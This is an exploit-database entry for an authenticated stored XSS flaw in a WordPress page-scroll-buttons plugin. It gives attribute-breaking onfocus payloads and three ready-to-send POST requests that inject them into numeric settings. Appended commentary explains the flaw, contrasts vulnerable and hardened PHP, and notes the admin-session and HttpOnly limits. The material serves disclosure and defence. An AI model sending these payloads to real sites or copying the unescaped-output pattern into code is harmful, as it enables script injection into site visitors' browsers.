## https://sploitus.com/exploit?id=WPEX-ID:2C7CA586-DEF8-4723-B779-09D7F37FA1AB
### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie); "

[$] " autofocus=autofocus onfocus=alert(document.domain); "



### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13



### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13



### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22
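All three PoCs store a non-numeric value in a numeric setting (`psb_distance`, `psb_buttonsize`, `psb_speed`) and rely on that value later being echoed into a double-quoted HTML attribute, where `" autofocus=autofocus onfocus=...` closes the attribute and adds an event handler. The following is an added illustration of that pattern and its fix, not the plugin's own code (the page does not show it); the option names, the nonce action, the handler function names and the rendered `<input>` are assumptions, while the field names, the `admin-post.php` action and the WordPress APIs used are real.

```php
<?php
// Added example, not the plugin's code. Option keys, the nonce action name and
// the rendered markup are assumed; only the request field names and the
// WordPress functions are real.

// --- Vulnerable pattern: the raw POST value is stored, then echoed into a
// quoted attribute unescaped. A value such as
//   " autofocus=autofocus onfocus=alert(document.cookie); "
// yields value="" autofocus=autofocus onfocus=alert(document.cookie); "" and
// the handler fires as soon as the page renders (stored XSS).
function psb_save_options_vulnerable() {
    check_admin_referer( 'save_page_scroll_buttons_options' ); // nonce action assumed
    foreach ( array( 'psb_distance', 'psb_buttonsize', 'psb_speed' ) as $name ) {
        update_option( $name, wp_unslash( $_POST[ $name ] ?? '' ) ); // no validation
    }
}

function psb_render_field_vulnerable( $name ) {
    echo '<input type="text" name="' . $name . '" value="' . get_option( $name ) . '">';
}

// --- Hardened pattern: these settings are numbers, so reject anything that is
// not a non-negative integer at save time (absint), require the capability that
// should own the settings page, and still escape for the attribute context at
// output time (esc_attr) so a bad value reaching the database by another path
// cannot execute. absint() turns the payload above into 0 and "13" into 13.
function psb_save_options_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    check_admin_referer( 'save_page_scroll_buttons_options' ); // nonce action assumed

    foreach ( array( 'psb_distance', 'psb_buttonsize', 'psb_speed' ) as $name ) {
        $value = isset( $_POST[ $name ] ) ? absint( wp_unslash( $_POST[ $name ] ) ) : 0;
        update_option( $name, $value );
    }

    // admin-post.php handlers must redirect back to the settings page themselves.
    wp_safe_redirect( wp_get_referer() );
    exit;
}

function psb_render_field_hardened( $name ) {
    $value = absint( get_option( $name, 0 ) ); // re-validate on read: defence in depth
    printf(
        '<input type="number" min="0" name="%s" value="%s">',
        esc_attr( $name ),
        esc_attr( $value )
    );
}

// The PoC requests hit admin-post.php with action=save_page_scroll_buttons_options,
// which WordPress dispatches to this hook.
add_action( 'admin_post_save_page_scroll_buttons_options', 'psb_save_options_hardened' );
```

Two caveats when reproducing the PoCs: the requests carry `[admin cookies]` and a valid `_wpnonce`, so the attacker already needs an administrator session, and the nonce prevents the same write via CSRF. Also, WordPress auth cookies are set HttpOnly, so the `document.cookie` payload will not reveal them; the `document.domain` variant in PoC #3 is the cleaner proof that script runs in the site's origin.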